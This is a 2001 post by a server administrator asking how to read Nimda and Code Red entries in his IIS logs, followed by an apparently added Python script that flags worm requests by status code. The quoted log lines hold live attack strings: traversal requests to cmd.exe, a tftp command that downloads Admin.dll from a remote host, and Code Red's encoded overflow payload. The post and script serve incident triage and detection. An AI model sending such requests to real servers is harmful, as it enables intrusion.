NImda/Code Red IIS log analysis questions

From: John Mack (jmack@p3.net)
Date: 12/18/01


From: jmack@p3.net (John Mack)
Date: 17 Dec 2001 16:57:43 -0800

Hello,
My servers are being repeatedly hit by CodeRed and Nimda attacks.
I think I got hit by CodeRed, but a tool from Symantec claimed it
eradicated this virus. I'm all patched up now so I guess I'm OK. I
have some questions about the IIS entries these worms leave behind and
I was hoping for some clarity on two items:

1)
These next 18 lines are a Nimda attack as described at:
http://www.cert.org/advisories/CA-2001-26.html. These 18 lines
appeared repeatedly in my IIS log files for several days. My concern
is the first line (I discuss it below).

2001-12-11 00:13:58 63.106.40.114 - 63.178.178.45 80 GET
/scripts/root.exe?/c+dir /c+dir 200 -
2001-12-11 00:13:58 63.106.40.114 - 63.178.178.45 80 GET
/scripts/root.exe?/c+tftp%20-i%2063.178.65.67%20GET%20Admin.dll%20Admin.dll
/c+tftp%20-i%2063.178.65.67%20GET%20Admin.dll%20Admin.dll 502 -
2001-12-11 00:14:01 63.106.40.114 - 63.178.178.45 80 GET
/scripts/Admin.dll - 401 -
2001-12-11 00:14:02 63.106.40.114 - 63.178.178.45 80 GET
/MSADC/root.exe?/c+dir /c+dir 403 -
2001-12-11 00:14:04 63.106.40.114 - 63.178.178.45 80 GET
/c/winnt/system32/cmd.exe?/c+dir /c+dir 404 -
2001-12-11 00:14:06 63.106.40.114 - 63.178.178.45 80 GET
/d/winnt/system32/cmd.exe?/c+dir /c+dir 404 -
2001-12-11 00:14:07 63.106.40.114 - 63.178.178.45 80 GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir /c+dir 500 -
2001-12-11 00:14:07 63.106.40.114 - 63.178.178.45 80 GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/c+dir 500 -
2001-12-11 00:14:08 63.106.40.114 - 63.178.178.45 80 GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/c+dir 404 -
2001-12-11 00:14:10 63.106.40.114 - 63.178.178.45 80 GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/c+dir 403 -
2001-12-11 00:14:11 63.106.40.114 - 63.178.178.45 80 GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir /c+dir 500 -
2001-12-11 00:14:11 63.106.40.114 - 63.178.178.45 80 GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir /c+dir 404 -
2001-12-11 00:14:13 63.106.40.114 - 63.178.178.45 80 GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir /c+dir 404 -
2001-12-11 00:14:15 63.106.40.114 - 63.178.178.45 80 GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir /c+dir 404 -
2001-12-11 00:14:17 63.106.40.114 - 63.178.178.45 80 GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir /c+dir 500 -
2001-12-11 00:14:17 63.106.40.114 - 63.178.178.45 80 GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir /c+dir 500 -
2001-12-11 00:14:18 63.106.40.114 - 63.178.178.45 80 GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir /c+dir 500 -
2001-12-11 00:14:18 63.106.40.114 - 63.178.178.45 80 GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir /c+dir 500 -

That first URL was "/scripts/root.exe?/c+dir /c+dir 200 -" and the
result was 200, meaning the request was successful. What happened
here? What did IIS do? What action occurs when root.exe is run with
those specific parameters? Is this harmful, did something bad
happen? Should I reformat my machine?

2)
The following one line is from my IIS log file and is the Code Red
worm as discussed at:
http://www.cert.org/incident_notes/IN-2001-09.html

2001-08-11 05:35:37 168.188.58.10 - 168.191.31.159 80 GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
400 -

This request registered as a '400' (bad request); does this basically
mean this attack was unsuccessful?

Thanks for any info,

-john
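A small triage helper, added here as an example and not code from the original post, that parses IIS log lines like the ones quoted above and reports which worm requests IIS actually served (2xx) versus refused (4xx) or errored on (5xx). The sample lines are constructed from the post's excerpt with the Code Red query shortened, and the signature labels are my own names for the patterns shown in the post.

```python
import re
# Constructed sample in the post's W3C extended log format (date time c-ip user
# s-ip s-port method uri-stem uri-query status bytes); Code Red query shortened.
SAMPLE_LOG = """\
2001-12-11 00:13:58 63.106.40.114 - 63.178.178.45 80 GET /scripts/root.exe?/c+dir /c+dir 200 -
2001-12-11 00:14:01 63.106.40.114 - 63.178.178.45 80 GET /scripts/Admin.dll - 401 -
2001-12-11 00:14:07 63.106.40.114 - 63.178.178.45 80 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir /c+dir 500 -
2001-12-11 00:14:13 63.106.40.114 - 63.178.178.45 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir /c+dir 404 -
2001-08-11 05:35:37 168.188.58.10 - 168.191.31.159 80 GET /default.ida?XXXX%u9090%u6858=a XXXX%u9090%u6858=a 400 -
2001-12-11 00:20:00 10.0.0.5 - 63.178.178.45 80 GET /index.html - 200 -
"""
# Request patterns taken from the post's excerpt, labelled by worm.
SIGNATURES = [
    ("nimda-root.exe", re.compile(r"/root\.exe", re.I)),
    ("nimda-admin.dll", re.compile(r"/admin\.dll", re.I)),
    ("nimda-cmd.exe", re.compile(r"/cmd\.exe", re.I)),
    ("codered-ida", re.compile(r"/default\.ida\?", re.I)),
]
FIELDS = ("date", "time", "c_ip", "user", "s_ip", "s_port",
          "method", "uri", "query", "status")

def parse_line(line):
    """Split one log line into named fields; None for blank/#-directive lines."""
    parts = line.split()
    if not parts or parts[0].startswith("#") or len(parts) < len(FIELDS):
        return None
    entry = dict(zip(FIELDS, parts))
    entry["status"] = int(entry["status"])
    return entry

def classify(entry):
    """Return (signature, outcome), or None if no worm pattern matches. A 2xx
    means IIS found and ran the requested file and returned its output (for
    root.exe, the supplied command ran); 4xx means it was refused or not found;
    5xx is a server-side error and still needs a look, the handler may have run."""
    for name, rx in SIGNATURES:
        if rx.search(entry["uri"]):
            s = entry["status"]
            return name, ("executed" if s < 300 else "rejected" if s < 500 else "error")
    return None

def triage(log_text):
    """List worm hits as (client ip, uri, signature, outcome) tuples."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        hit = classify(entry) if entry else None
        if hit:
            hits.append((entry["c_ip"], entry["uri"], hit[0], hit[1]))
    return hits
```

Running `triage` over a real log and filtering for the "executed" outcome isolates the requests that need investigation, such as the 200 on root.exe in the post.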